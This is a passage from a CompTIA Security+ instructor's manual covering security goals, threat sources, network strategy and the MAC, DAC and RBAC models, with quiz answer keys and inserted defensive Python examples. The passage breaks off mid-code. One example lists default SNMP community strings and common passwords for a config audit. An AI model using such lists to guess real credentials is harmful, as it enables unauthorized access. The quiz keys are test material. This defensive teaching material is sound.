CompTIA Security+ Certification_ 2nd edit

					CompTIA Security+
Certification

Instructor’s Edition
Contents
    Introduction                                                                                                          v
        Topic A: About the manual............................................................................... vi
        Topic B: Setting student expectations .............................................................. xi
        Topic C: Classroom setup................................................................................ xix
        Topic D: Support.............................................................................................xxvii

    Security overview                                                                                                   1-1
        Topic A: Introduction to network security....................................................... 1-2
        Topic B: Understanding security threats ......................................................... 1-5
        Topic C: Creating a secure network strategy................................................... 1-9
        Topic D: Windows Server 2003 server access control ................................... 1-13
        Unit summary: Security overview................................................................... 1-24

    Authentication                                                                                                      2-1
        Topic A: Introduction to authentication........................................................... 2-2
        Topic B: Kerberos............................................................................................ 2-8
        Topic C: Challenge Handshake Authentication Protocol ............................... 2-14
        Topic D: Digital certificates............................................................................ 2-16
        Topic E: Security tokens ................................................................................ 2-19
        Topic F: Biometrics........................................................................................ 2-22
        Unit summary: Authentication ........................................................................ 2-30

    Attacks and malicious code                                                                                          3-1
        Topic A: Denial of service attacks................................................................... 3-2
        Topic B: Man-in-the-middle attacks............................................................... 3-15
        Topic C: Spoofing........................................................................................... 3-18
        Topic D: Replays ............................................................................................ 3-25
        Topic E: TCP session hijacking...................................................................... 3-27
        Topic F: Social engineering ........................................................................... 3-29
        Topic G: Attacks against encrypted data ........................................................ 3-32
        Topic H: Software exploitation....................................................................... 3-37
        Unit summary: Attacks and malicious code.................................................... 3-51

    Remote access                                                                                                       4-1
        Topic A: Securing remote communications..................................................... 4-2
        Topic B: Authentication .................................................................................. 4-5
        Topic C: Virtual private networks .................................................................. 4-16
        Topic D: Telecommuting vulnerabilities ........................................................ 4-27
        Unit summary: Remote access ........................................................................ 4-31

    E-mail                                                                                                              5-1
        Topic A: Secure e-mail and encryption ........................................................... 5-2
        Topic B: PGP and S/MIME encryption.......................................................... 5-13
        Topic C: E-mail vulnerabilities....................................................................... 5-24
        Unit summary: E-mail ..................................................................................... 5-30

    Web security                                                                                                        6-1
        Topic A: SSL/TLS protocol............................................................................. 6-2
ii   CompTIA Security+ Certification

        Topic B: Vulnerabilities of Web tools ........................................................... 6-15
        Topic C: Configuring Internet Explorer security ........................................... 6-30
        Unit summary: Web security .......................................................................... 6-40

    Directory and file transfer services                                                                              7-1
        Topic A: Introduction to directory services..................................................... 7-2
        Topic B: File transfer services........................................................................ 7-10
        Topic C: File sharing...................................................................................... 7-25
        Unit summary: Directory and file transfer services ........................................ 7-28

    Wireless and instant messaging                                                                                    8-1
        Topic A: IEEE 802.11 ..................................................................................... 8-2
        Topic B: WAP 1.x and WAP 2.0 ................................................................... 8-10
        Topic C: Wired equivalent privacy ................................................................ 8-23
        Topic D: Instant messaging ............................................................................ 8-36
        Unit summary: Wireless and instant messaging ............................................. 8-42

    Network devices                                                                                                   9-1
        Topic A: Understanding firewalls ................................................................... 9-2
        Topic B: Routers ............................................................................................. 9-9
        Topic C: Switches .......................................................................................... 9-16
        Topic D: Telecom, cable modem, and wireless devices................................. 9-19
        Topic E: Securing remote access ................................................................... 9-23
        Topic F: Intrusion detection systems ............................................................. 9-26
        Topic G: Network monitoring ........................................................................ 9-29
        Unit summary: Network devices .................................................................... 9-36

    Transmission and storage media                                                                                  10-1
        Topic A: Transmission media......................................................................... 10-2
        Topic B: Storage media................................................................................. 10-11
        Unit summary: Transmission and storage media........................................... 10-19

    Network security topologies                                                                                     11-1
        Topic A: Security topologies.......................................................................... 11-2
        Topic B: Network Address Translation.......................................................... 11-7
        Topic C: Tunneling ....................................................................................... 11-21
        Topic D: Virtual Local Area Networks ......................................................... 11-23
        Unit summary: Network security topologies ................................................. 11-29

    Intrusion detection                                                                                             12-1
        Topic A: Intrusion detection systems ............................................................. 12-2
        Topic B: Network-based and host-based IDS ................................................ 12-5
        Topic C: Active and passive detection .......................................................... 12-14
        Topic D: Honeypots ...................................................................................... 12-20
        Topic E: Incident response............................................................................ 12-25
        Unit summary: Intrusion detection ................................................................ 12-28

    Security baselines                                                                                              13-1
        Topic A: OS/NOS hardening.......................................................................... 13-2
        Topic B: Network hardening......................................................................... 13-14
        Topic C: Application hardening .................................................................... 13-23
        Topic D: Workstations and servers ............................................................... 13-43
        Unit summary: Security baselines ................................................................. 13-55

    Cryptography                                                                                                  14-1
        Topic A: Concepts of cryptography................................................................ 14-2
        Topic B: Public Key Infrastructure (PKI)...................................................... 14-11
        Topic C: Key management and life cycle...................................................... 14-18
        Topic D: Setting up a certificate server ......................................................... 14-26
        Unit summary: Cryptography......................................................................... 14-41

    Physical security                                                                                             15-1
        Topic A: Access control.................................................................................. 15-2
        Topic B: Environment ................................................................................... 15-12
        Unit summary: Physical security.................................................................... 15-18

    Disaster recovery and business continuity                                                                     16-1
        Topic A: Disaster recovery ............................................................................. 16-2
        Topic B: Business continuity......................................................................... 16-11
        Topic C: Policies and procedures .................................................................. 16-14
        Topic D: Privilege management .................................................................... 16-24
        Unit summary: Disaster recovery and business continuity ............................ 16-28

    Computer forensics and advanced topics                                                                        17-1
        Topic A: Understanding computer forensics .................................................. 17-2
        Topic B: Risk identification............................................................................ 17-9
        Topic C: Education and training.................................................................... 17-11
        Topic D: Auditing .......................................................................................... 17-14
        Topic E: Documentation................................................................................ 17-17
        Unit summary: Computer forensics and advanced topics .............................. 17-21

    Certification exam objectives map                                                                             A-1
        Topic A: Comprehensive exam objectives ......................................................A-2

    Course summary                                                                                                S-1
        Topic A: Course summary ............................................................................... S-2
        Topic B: Continued learning after class .......................................................... S-7

    Glossary                                                                                                      G-1

    Index                                                                                                          I-1


Unit 1
Security overview
Unit time: 60 minutes

Complete this unit, and you’ll know how to:

A Discuss network security.
B Discuss security threat trends and their ramifications.
C Determine the factors involved in creating a secure network strategy.
D Control access to a Windows Server 2003 server.


Topic A: Introduction to network security
Explanation
As personal and business-critical applications become more prevalent on the Internet, network-based applications and services can pose security risks to all information resources. Network security has not been given the attention it deserves: information is an asset and must be protected. Without adequate protection or network security, a company is highly susceptible to financial or commercial loss. The fear of a security breach can be just as debilitating to a business as an actual breach. Distrust of the Internet can limit business opportunities for organizations, especially those that are 100% Web-based. It is imperative that organizations enact security policies and procedures and incorporate safeguards that are effective and are perceived as effective by potential customers.

Network security is the process by which digital information assets are protected. The goals of network security are to maintain integrity, protect confidentiality, and assure availability. This includes, but is not limited to, enforcing copyright and privacy laws, protecting against data loss, and ensuring that systems are available on an uninterrupted basis.

The growth of computing has generated enormous advances in the way people live and work. For the Internet to achieve its potential usefulness, it is important that all networks are protected from threats and vulnerabilities.

A threat is defined as any activity that poses a danger to your information. A vulnerability is a weakness in a system, such as misconfigured hardware or software, poor design, or end-user carelessness. Threats exploit vulnerabilities in order to gain unauthorized access to a network.

Security risks cannot be completely eliminated or prevented, but with effective risk management and assessment they can be reduced to an acceptable level. What is acceptable depends on how much risk the individual or organization is willing to assume. The risk is worth assuming if the benefits of implementing the risk-reducing safeguards far exceed the costs.

Effect of evolving technologies on security
When networks were first implemented, they consisted of dumb terminals connected to a central mainframe computer. The mainframe was kept in a well-secured computer room, and users could connect only via dumb terminals from approved locations over static, point-to-point connections. A username and password were required to access the system, and user access was restricted. Security was very simple under those circumstances.

With the development of more extensive network infrastructures made up of hardware and software (specifically PCs, LANs, and WANs), global access to information increased dramatically, as did the need for advanced network security.
    • The introduction of firewalls in 1995 allowed successful businesses to balance security with simple outbound access to the Internet (mostly for e-mail and Web surfing), creating a positive impact on the bottom line of those businesses.
    • The growth of extranets realized tremendous corporate cost savings by connecting internal systems to business partners, by connecting sales-force automation systems to mobile employees, and by providing electronic commerce connections to business customers and consumers.
    • The proliferation of firewalls began to be augmented by intrusion detection, authentication, authorization, and vulnerability assessment systems.

Today, companies are achieving a balance by keeping the bad guys out with
increasingly complex ways of letting the good guys in.

Managing risk
Security is critical for all types of Internet businesses. By protecting high-availability systems from intrusion and corruption, security technologies help companies build trust with their employees, suppliers, partners, and customers—a trust that information is protected and transactions are reliable.
When most people talk about security, they mean ensuring that users:
  1 Can perform only tasks they are authorized to do
  2 Can obtain only information they are authorized to have
  3 Cannot cause damage to the data, applications, or operating environment of a
     system
The word “security” connotes protection against malicious attack by outsiders; security
also involves controlling the effects of errors and equipment failures. Anything that can
protect against an attack can prevent random misfortune as well.

Goals of network security
The goal of implementing network security is to maintain an acceptable level of
integrity, confidentiality, and availability concerning your data.

Integrity
Integrity refers to the assurance that data is not altered or destroyed in an unauthorized
manner. Integrity is maintained when the message received is identical to the message
sent. Even for data that is not confidential, data integrity must be maintained. For
example, you might not care if anyone sees your routine business transaction, but you
would certainly care if the transaction were modified.
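As an added illustration (not part of the course text), the following Python shows how a receiver can check that the message received is identical to the message sent. It contrasts an unkeyed hash, which anyone who modifies the message in transit can simply recompute, with a keyed hash (HMAC-SHA256) whose key the modifier does not hold. The key and the message are constructed sample values.

```python
import hashlib
import hmac


def plain_digest(message: bytes) -> str:
    """Unkeyed SHA-256 digest: detects accidental corruption only."""
    return hashlib.sha256(message).hexdigest()


def keyed_tag(key: bytes, message: bytes) -> str:
    """HMAC-SHA256 tag: only a holder of the key can produce a valid tag."""
    return hmac.new(key, message, hashlib.sha256).hexdigest()


def verify_keyed(key: bytes, message: bytes, tag: str) -> bool:
    """Constant-time comparison of the received tag with a freshly computed one."""
    return hmac.compare_digest(keyed_tag(key, message), tag)


def demo_integrity() -> dict:
    # Constructed sample values; the key is shared by sender and receiver in advance.
    key = b"constructed-shared-key"
    sent = b"PAY 100.00 TO ACCOUNT 4471"

    # What the sender transmits alongside the message.
    tag = keyed_tag(key, sent)
    digest = plain_digest(sent)

    # An unauthorized party on the path alters the amount.
    tampered = sent.replace(b"100.00", b"900.00")

    # With an unkeyed digest the modifier recomputes it for the new message, so the
    # receiver's check (hash of what arrived == digest that arrived) still passes.
    recomputed_digest = plain_digest(tampered)
    plain_check_tampered = plain_digest(tampered) == recomputed_digest

    return {
        "plain_check_original": plain_digest(sent) == digest,
        "plain_check_tampered": plain_check_tampered,               # True: modification undetected
        "keyed_check_original": verify_keyed(key, sent, tag),
        "keyed_check_tampered": verify_keyed(key, tampered, tag),  # False: modification detected
    }


if __name__ == "__main__":
    for name, ok in demo_integrity().items():
        print(f"{name}: {ok}")
```

The unkeyed check is still useful against random corruption, which the text notes security also covers; only the keyed check holds up against a deliberate modifier, and `hmac.compare_digest` avoids leaking how many leading bytes of the tag matched.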

Confidentiality
Confidentiality is the protection of data from unauthorized access by or disclosure to a
third party. Whether it is customer data or internal company data, a business is
responsible for protecting the privacy of its data.
Proprietary company information that is sensitive in nature also needs to remain
confidential. Only authorized parties should be granted access to information that has
been identified as confidential. The transmission of such information should be
performed in a secure manner, preventing any unauthorized access en route.

Availability
Availability is defined as the assurance that computer services can be accessed when needed. It is the goal that denial-of-service attacks undermine: such attacks slow down or even crash systems by engulfing network equipment with useless noise. Applications require differing availability levels, depending on the business impact of downtime. For an application to be available, all components, including application and database servers, storage devices, and the end-to-end network, must provide continuous service.
The increasing dependence of businesses and organizations on networked applications
and the Internet, together with the convergence of voice with data, increases
requirements for highly available applications. System downtime of any sort might
result in lack of credibility, lower customer satisfaction, and lost revenues.

Do it!  A-1: Discussing network security
Questions and answers
  1 What are the goals of security? (Choose all that apply.)
     A Maintain integrity
     B Protect confidentiality
     C Assure availability
     D Improve performance

  2 Which of the following types of access can be a threat to networks?
     A Authorized
     B Needed
     C Unauthorized
     D Invalid

  3 Integrity is maintained when the message sent is identical to the message received. True or false?

     True

  4 Confidentiality is the protection of data from authorized disclosure to a third party. True or false?

     False: It is the protection of data from unauthorized disclosure to a third party.

  5 Availability is defined as the continuous operation of computing systems. True or false?

     True


Topic B: Understanding security threats
Explanation
The goals of network security are integrity, confidentiality, and availability. Data threats, however, are pervasive in today’s society and continue to challenge even the most secure systems. Among these threats are:
    • Corporate espionage — The FBI estimates that every year U.S. companies lose up to $100 billion in business profits because of information theft. This often stems from reports and confidential information being thrown in the trash.
    • Identity theft — According to the Identity Theft Resource Center, each year over 700,000 Americans have their personal information used illegally.
    • Computer viruses — Computer Economics magazine reports that the estimated worldwide impact of malicious code was 13.2 billion dollars in the year 2001 alone.
Each company must weigh the cost of network security against the cost of lost assets and decide how much it is willing to risk.

When data integrity is compromised, an organization must incur extremely high costs to correct the consequences of attacks. If an unauthorized user makes changes to a Web site that provides customers with the wrong information about specific items, the organization must further invest to correct the Web site and address any public relations issues with customers.

When data confidentiality is compromised, the consequences to the organization are not always immediate, but they are usually costly. Unauthorized users might find scientific data on company research and steal it to use for their own competitive advantage.

When application availability is compromised by network outages, organizations can lose millions of dollars in just a few hours. Unauthorized users can take down Web servers and prevent customers from viewing and obtaining the information they need. This could cause customers to go elsewhere for services.

The compromise of any of these three security goals can cost an organization dearly. Sometimes the costs are direct, such as when data integrity is compromised or when an e-commerce Web site is rendered unavailable by a denial of service attack. Other times, the costs are indirect, such as when corporate secrets have been stolen or when users lose productivity due to down time.

Sources of threats
There are four primary causes of compromised security:
    • Technology weaknesses
    • Configuration weaknesses
    • Policy weaknesses
    • Human error or malice

Technology weaknesses
Computer and network technologies have intrinsic security weaknesses in the following areas:
    • TCP/IP — A communication protocol suite for routed networks, TCP/IP was designed as an open standard to facilitate communications. Because of its wide usage, there are plenty of experts and expert tools that can compromise this open technology. It cannot guard a network against message-modification attacks or protect connections against unauthorized-access attacks.
    • Operating systems — Operating systems such as UNIX, Linux, Windows NT and 95, and OS/2 need the latest patches, updates, and upgrades applied to protect users.
    • Network equipment — Routers, firewalls, and switches must be protected through the use of password protection, authentication, routing protocols, and firewalls.

Configuration weaknesses
Even the most secure technology can be misconfigured. Security problems are often caused by one of the following configuration weaknesses:
    • Unsecured accounts — User account information might be transmitted insecurely across the network, exposing usernames and passwords to sniffers, which are programs for monitoring network activity, capable of capturing and analyzing IP packets on an Ethernet network or dial-up connection.
    • System accounts with easily guessed passwords — Poorly administered password policies can cause problems in this area.
    • Misconfigured Internet services — A common problem is to turn on Java and JavaScript in Web browsers, enabling attacks via hostile Java applets. Another problem is putting high-security data on a Web server; this type of data (social security numbers, credit card numbers) should be behind a firewall and require user authentication and authorization to access.
    • Unsecured default settings — Many products have default settings that enable security holes (for example, UNIX sendmail and X Windows).
    • Misconfigured network equipment — Misconfiguration of network devices can cause significant security problems. For example, misconfigured access lists, routing protocols, or Simple Network Management Protocol (SNMP) community strings can open up large security holes.
    • Trojan horse programs — Delivery vehicles for destructive code, these appear to be harmless programs but are enemies in disguise. They can delete data, mail copies of themselves to e-mail address lists, and open up other computers for attack.
    • Vandals — These software applications or applets can destroy a single file or a major portion of a computer system.
    • Viruses — These are the largest threat to network security and have proliferated in the past few years. They are designed to replicate themselves and infect computers when triggered by a specific event. The effect of some viruses is minimal and only an inconvenience, while others are more destructive and cause major problems, such as deleting files or slowing down entire systems.
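Several of the weaknesses listed above (easily guessed or recoverably stored account passwords, default SNMP community strings, and management access over a cleartext protocol) can be caught by reviewing a device's configuration before it goes into production. The following Python audit is an added example, not part of the course material. The configuration it reads is a constructed sample written in the style of a router's text configuration (`snmp-server community`, `username ... password`, `transport input`), and the lists of default community strings and common passwords are illustrative assumptions rather than a complete policy.

```python
import re

# Constructed sample configuration (router-style text config, not taken from any real device).
SAMPLE_CONFIG = """\
hostname edge-rtr-1
username admin password 0 admin
username ops secret 5 $1$xyz$placeholderhash
snmp-server community public RO
snmp-server community private RW
snmp-server community m0n1t0r-only RO
line vty 0 4
 transport input telnet
line vty 5 15
 transport input ssh
"""

# Illustrative lists only; a real audit would use a maintained, organization-specific policy.
DEFAULT_COMMUNITIES = {"public", "private"}
COMMON_PASSWORDS = {"admin", "password", "123456", "letmein", "changeme"}

SNMP_RE = re.compile(r"snmp-server community (\S+)")
USER_PW_RE = re.compile(r"username (\S+) password \d+ (\S+)")
TRANSPORT_RE = re.compile(r"transport input (.+)")


def audit_config(text: str) -> list:
    """Return (line_number, finding, detail) tuples for each weakness found."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()

        # Default SNMP community strings give anyone who guesses them read (or write) access.
        m = SNMP_RE.match(line)
        if m and m.group(1).lower() in DEFAULT_COMMUNITIES:
            findings.append((lineno, "snmp-default-community", m.group(1)))
            continue

        # Local accounts defined with 'password' rather than 'secret'.
        m = USER_PW_RE.match(line)
        if m:
            user, password = m.groups()
            if password.lower() in COMMON_PASSWORDS or password.lower() == user.lower():
                findings.append((lineno, "weak-account-password", user))
            else:
                # 'password' stores the value in a recoverable form; 'secret' stores a hash.
                findings.append((lineno, "recoverable-stored-password", user))
            continue

        # Telnet carries the login in cleartext, exposing it to the sniffers described above.
        m = TRANSPORT_RE.match(line)
        if m:
            protocols = set(m.group(1).split())
            if "telnet" in protocols or "all" in protocols:
                findings.append((lineno, "cleartext-management", m.group(1)))
    return findings


def summarize(findings: list) -> dict:
    """Count findings per category for a quick report."""
    counts = {}
    for _, kind, _ in findings:
        counts[kind] = counts.get(kind, 0) + 1
    return counts


if __name__ == "__main__":
    results = audit_config(SAMPLE_CONFIG)
    for lineno, kind, detail in results:
        print(f"line {lineno}: {kind} ({detail})")
    print(summarize(results))
```

On the sample the audit flags the `admin` account (password equal to the username), both default community strings, and the Telnet-enabled terminal lines, while the `ops` account stored as a `secret` hash and the non-default read-only community pass. The same check belongs in a change-control step so that a misconfiguration is caught before the device is reachable.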

Human error and malice
Human error and malice constitute a significant percentage of breaches in network security. Even well-trained and conscientious users can cause great harm to security systems, often without knowing it.
Well-intentioned users can contribute to security breaches in several ways:
    • Accident — The mistaken destruction, modification, disclosure, or incorrect
      classification of information.
    • Ignorance — Inadequate security awareness, lack of security guidelines, lack of
      proper documentation, lack of knowledge. Users might inadvertently give
      information on security weaknesses to attackers.
    • Workload — Too many or too few system administrators.
Conversely, ill-willed employees or professional hackers and criminals can access
valuable assets through deceit:
    • Dishonesty — Fraud, theft, embezzlement, and the selling of confidential
      corporate information.
    • Impersonation — Attackers might use the telephone to impersonate employees
      to persuade users or administrators to give out usernames, passwords, modem
      numbers, and so on.
    • Disgruntled employees — Those who have been fired, laid off, or reprimanded
      might infect the network with a virus or delete files. Usually one of the largest
      security threats, these people know the network and the value of the information
      on it.
    • Snoops — Individuals who take part in corporate espionage by gaining
      unauthorized access to confidential data and providing this information to
      competitors.
    • Denial-of-service attacks — These attacks engulf network equipment with
      useless noise, thereby causing systems to slow down or even crash.
1–8      CompTIA Security+ Certification

Do it!              B-1:      Identifying security threats
                      Questions and answers
                       1 Which of the following computer and network technologies have intrinsic security
                         weaknesses?
                          A      TCP/IP
                          B      Operating systems
                          C      Network equipment
                          D      All of the above

                       2 What is a crime called in which one person masquerades under the identity of
                         another?
                          A      Identity theft
                          B      Confidentiality
                          C      Integrity
                          D      All of the above

                       3 Which of the following is not a primary cause of network security threats?
                          A      Encryption
                          B      Technology weaknesses
                          C      Policy weaknesses
                          D      Configuration weaknesses
                          E      Human error

                       4 Trojan horses are destructive programs that masquerade as benign applications.
                         True or false?

                          True

                       5 Which of the following is not considered a configuration weakness?
                          A      Unsecured accounts
                          B      Misconfigured Internet services
                          C      Misconfigured access lists
                          D      Human ignorance


Topic C: Creating a secure network strategy
Explanation   The most important goal of network security is to achieve the state where any action
              that is not expressly permitted is prohibited. To be successful, a network strategy must
              address both internal and external threats.
              Successful strategies look at technical threats and their appropriate responses. They are
              used to develop the necessary network security policies and procedures for the response
              effort. A strong security strategy defines policies and procedures and reduces risk across
              perimeter security, the Internet, intranets, and LANs.
              When planning a strong security strategy, here are some things to consider:
                  • Human factors
                  • Knowing your weaknesses
                  • Limiting access
                  • Achieving security through consistency
                  • Physical security
                  • Perimeter security
                  • Firewalls
                  • Web and file servers
                  • Access control
                  • Change management
                  • Encryption
                  • Intrusion detection systems

              Human factors
              Many security procedures fail because their designers do not truly consider the users.
              You might want to consider the following questions:
                  • Does your network security system recognize that a user has tried to log on to
                    more than one computer at the same time?
                  • Can staff members who forgot to log off at work also log on from home using
                    remote dial-up?
                  • Can staff members log on to the network from a machine other than their own?
                  • Is your security policy built into network management tools so the
                    misconfiguration of a server or router is flagged and noticed?
                  • Can an employee remove a hard disk, or add a ZIP drive, CD-R, flash drive, or
                    other removable storage device to a desktop without anyone noticing?
              Security must be sold to your users and compliance must be enforced. Users must
              understand and accept the need for security. To reduce your security risk, you must
              know where your users are, electronically and physically, and whether they are
              following security policy.

                  Knowing your weaknesses
                  Every security system has vulnerabilities. Attack your own system to determine where
                  your weaknesses are located. Once you identify your weaknesses, you can plug those
                  holes effectively.
                  Determine the areas that present the largest danger to your system and prevent access to
                  them immediately. Add more security to these areas. Is your weakness an internal
                  server, a firewall, a router, or improperly trained staff? Develop a methodology for
                  testing and ensuring your systems remain safe.

                  Limiting access
                  The security of a system is only as good as the weakest security level of any single host
                  in the system. Not everyone needs to have authorization to every folder or document.
                  Segment your network users, files, and servers. For example, staff members in the
                  Accounting Department do not need access to personnel files in the Human Resource
                  Department.
                  The default access should be no access. From there, you open holes with permissions
                  and authentication allowing authorized users to access resources. If you start from this
                  premise, it’s easier than starting from “open access.”

                  Achieving security through consistency
                  Develop a change management process around your network. Whenever there are
                  network upgrades, whether patches, the addition of new users, or updating a firewall,
                  you should document the process and procedures. If you are thorough in documenting
                  the process, you limit your security risks. When you add new users to the network, do
                  you always do the same thing? What if you forget a step? Is your security breached? Be
                  methodical and follow a written process.

                  Physical security
                  It makes no sense to install complicated software security measures when access to the
                  hardware is not controlled. Require authorization into your network room and the
                  different closets in which network equipment is kept; otherwise, unauthorized users can
                  easily access and destroy network equipment in seconds.

                  Perimeter security
                  Perimeter security is controlling access to critical network applications, data, and
                  services. The services offered include secure Web and file servers, gateways, remote
                  access, and naming services. Each organization should be prepared to select perimeter
                  security tools based on their network requirements and budget. Along with the network,
                  for successful perimeter security, blueprints for all campus grounds and buildings are
                  necessary. In addition, all hardware, PCs, and software components must be
                  documented.

                  Firewalls
                  A firewall is a hardware or software solution that contains programs designed to enforce
                  an organization’s security policies by restricting access to specific network resources.
                  The firewall creates a protective layer between the network and the outside world. The
                  firewall has built-in filters that can be configured to deny unauthorized or dangerous
                  materials from entering the network. Firewalls log attempted intrusions and create
                  reports.

Web and file servers
Organizations must test mission-critical hosts, workstations, and servers for
vulnerabilities. Determine if your organization has the in-house expertise and
experience to successfully test the network. If not, outsourcing to a reputable security
assessment organization is recommended.

Access control
Access control ensures that only legitimate traffic is allowed into or out of your network.
Users identify themselves at login, typically by supplying a password to prove their
identity. In addition, access must be permitted or denied for each application, function, and
file. Most attacks against networks occur when unauthorized people find a way through the
login system, by guessing or stealing a user identity that the system recognizes. These
attacks succeed because many existing networks rely on access control systems that require
nothing more than a user identity together with a password. With this limited security,
attacks are simple and common. Many systems do not log invalid password entries, which
allows an attacker to be persistent: hackers can continue trying different passwords
repeatedly without being noticed.
Another type of access control is personal identification numbers (PINs). These are
commonly used at banks. The only difference between passwords and PINs is that PINs
are usually all numeric and only a few characters long.
Security tokens are gaining popularity as well. This hardware plugs into computing
devices and dynamically generates a new password at each login. This is done
automatically for the user once the user authenticates with a password.
Smartcards, with embedded chips, contain code that identifies the holder, or contain keys
that can read and send encrypted data. These cards are becoming more popular and are
very useful for maintaining security.
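The passage above notes that many systems never log invalid password entries, so repeated guessing goes unnoticed. The following is an added example, not code from the manual, showing what that missing check looks like as detection logic: it runs a sliding window over constructed authentication log lines (the log format, account names, addresses and the threshold are all assumptions) and flags accounts that accumulate several failures in a short interval, noting whether a successful logon followed the burst.

```python
"""Detect repeated failed logins that an unmonitored system would miss.

Added example, not from the Security+ manual: the log format, account names,
addresses and threshold below are constructed assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample log lines: "<date> <time> <result> user=<name> src=<ip>"
SAMPLE_LOG = """\
2004-03-01 09:00:01 FAIL user=jsmith src=10.0.0.7
2004-03-01 09:00:04 FAIL user=jsmith src=10.0.0.7
2004-03-01 09:00:09 FAIL user=jsmith src=10.0.0.7
2004-03-01 09:00:12 FAIL user=jsmith src=10.0.0.7
2004-03-01 09:00:15 FAIL user=jsmith src=10.0.0.7
2004-03-01 09:00:20 OK   user=jsmith src=10.0.0.7
2004-03-01 09:05:00 FAIL user=asmith src=10.0.0.9
2004-03-01 09:45:00 FAIL user=asmith src=10.0.0.9
2004-03-01 10:30:00 OK   user=asmith src=10.0.0.9
"""


def parse_line(line):
    """Return (timestamp, result, user, src) for one constructed log line."""
    date, time, result, user_field, src_field = line.split()
    ts = datetime.strptime(f"{date} {time}", "%Y-%m-%d %H:%M:%S")
    return ts, result, user_field.split("=", 1)[1], src_field.split("=", 1)[1]


def find_password_guessing(log_text, threshold=5, window=timedelta(minutes=10)):
    """Flag accounts with at least `threshold` failures inside a sliding window.

    Returns {user: (failure_count, first_ts, last_ts, followed_by_success)} for
    each flagged account. followed_by_success is True when a successful logon
    occurred within `window` after the burst, which is what a guessed or stolen
    password looks like, as opposed to a forgotten one.
    """
    failures = defaultdict(list)
    successes = defaultdict(list)
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, result, user, _src = parse_line(raw)
        (failures if result == "FAIL" else successes)[user].append(ts)

    flagged = {}
    for user, times in failures.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            # Advance the window start until every failure in it fits within `window`.
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                after_burst = [s for s in successes.get(user, [])
                               if times[end] < s <= times[end] + window]
                flagged[user] = (count, times[start], times[end], bool(after_burst))
                break
    return flagged


if __name__ == "__main__":
    for user, (n, first, last, success) in find_password_guessing(SAMPLE_LOG).items():
        tag = ", then a successful logon" if success else ""
        print(f"{user}: {n} failures between {first:%H:%M:%S} and {last:%H:%M:%S}{tag}")
```

On the constructed sample, jsmith is flagged (five failures in fourteen seconds followed by a success) while asmith's two failures forty minutes apart are not; the threshold and window are the knobs a practitioner tunes against their own logon volume.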

Change management
Change management is a set of procedures developed by network staff that are followed
whenever a change is made to the network. Most organizations focus on servers and do
not document changes to the backbone, which touches the entire network infrastructure.
It is important to document changes to all areas of your IT infrastructure.

Encryption
Encryption ensures that messages cannot be read by anyone other than their intended
audience, even if they are intercepted. Encryption is usually implemented to protect data
that is transported over the public network; it uses advanced algorithms to scramble
messages and their attachments.

Intrusion detection systems
An intrusion detection system (IDS) provides 24/7 network surveillance. It analyzes
packet data streams within the network and searches for unauthorized activity. When
unauthorized activity is detected, the IDS can send alarms to a management console
with details of the activity and can order other systems to cut off the unauthorized
session.

Do it!              C-1:      Discussing strategies to secure your network
                      Questions and answers
                       1 Ideally, the administrator should give everyone access to everything and start
                         securing when a problem arises. True or false?

                          False: Start with a default of no access and assign permissions on a need-to-use basis.

                       2 Which of the following is considered a successful approach to network security?
                          A    Knowing your weaknesses
                          B    Determining the cost
                          C    Remembering human factors
                          D    Controlling secrets
                          E    All of the above

                       3 Which of the following is/are incorrect about firewalls?
                          A    Restricts access to specific network resources
                          B    Contains built-in filters
                          C    Creates a protective layer between the network and the outside world
                          D    Is a hardware only solution

                       4 Examples of access controls might include which of the following?
                          A    Smartcards
                          B    Security token
                          C    PINs
                          D    All of the above


Topic D: Windows Server 2003 server access
         control
              This topic covers the following CompTIA Security+ exam objectives.

               #        Objective

               1.1      Recognize and be able to differentiate and explain the following access control models
                         • MAC
                         • DAC
                         • RBAC

               5.5      Explain the following concepts of privilege management
                         • MAC / DAC / RBAC (Mandatory Access Control / Discretionary Access Control / Role
                           Based Access Control)




              Introducing server access control
Explanation   Access control is a policy, software component, or hardware component that is used to
              restrict access to a resource. This could be a password, keypad, badge, or set of
              permissions granted to the resource. When applied, several levels of security must be
              passed:
                     • Identify — The user must show identification. This might involve showing a
                       badge or driver’s license, entering a logon ID, or swiping a card.
                     • Authenticate — The user is authenticated to the network. This can be
                       accomplished with a password, PIN, hand scan, or signature.
                     • Authorize — The system restricts the user’s access to a particular resource based
                       on a predetermined set of policies.

              MAC, DAC, and RBAC
              In discussing access to a resource, three access control models must be addressed:
                     • Mandatory access control (MAC)
                     • Discretionary access control (DAC)
                     • Role-based access control (RBAC)

              MAC
              Mandatory access control (MAC) is a non-discretionary control used in high-security
              locations. Here, you classify all users and resources and assign a security level to the
              classification. Access requests are denied if the user’s security level does not match or
              exceed the security level of the resource. For example, military personnel must have a
              high-security clearance to read or revise secured documents.

                  DAC
                  Discretionary access control (DAC) allows an owner of a file to dictate who can access
                  the file and to what extent. The owner of the resource creates an access control list
                  (ACL) to list the users with access and the type of access (permissions). Most operating
                  systems provide some form of the read, write, execute, modify, and delete permissions.
                  One of the drawbacks to this method is that each owner controls the access levels to his
                  or her personal files. With inappropriate access control, confidential information can be
                  accidentally or deliberately compromised, or resources can be rendered inaccessible.
                  The assumption is that the owner of the file has the expertise to manage the access
                  levels appropriately.

                  RBAC
                  Role-based access control (RBAC), not to be confused with rule-based access control, is
                  based on the role a user plays in the organization. Instead of giving access to individual
                  users, access control is granted to groups of users who perform a common function.
                  This allows for centralized administration, where access to resources is defined based
                  on roles, and each user is assigned one or more roles. This is considered a non-
                  discretionary access control.
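To make the three models concrete, here is an added example (not part of the manual) that encodes each decision rule as a small Python function: a MAC dominance check over constructed clearance levels, a DAC resource whose owner alone edits its ACL, and an RBAC table that maps constructed roles to permissions. All level, user, role and resource names are assumptions chosen for illustration.

```python
"""Decision rules for the three access control models, as small functions.

Added example, not from the Security+ manual: the clearance levels, users,
roles and resource names are constructed for illustration.
"""
from dataclasses import dataclass, field

# --- MAC: labels are ordered; access requires the subject's clearance to
#     match or exceed the object's classification. ---
LEVELS = {"unclassified": 0, "confidential": 1, "secret": 2, "top secret": 3}


def mac_allows(subject_clearance, object_label):
    """Neither user nor owner can override this: the levels are set by policy."""
    return LEVELS[subject_clearance] >= LEVELS[object_label]


# --- DAC: the owner of the resource maintains its ACL. ---
@dataclass
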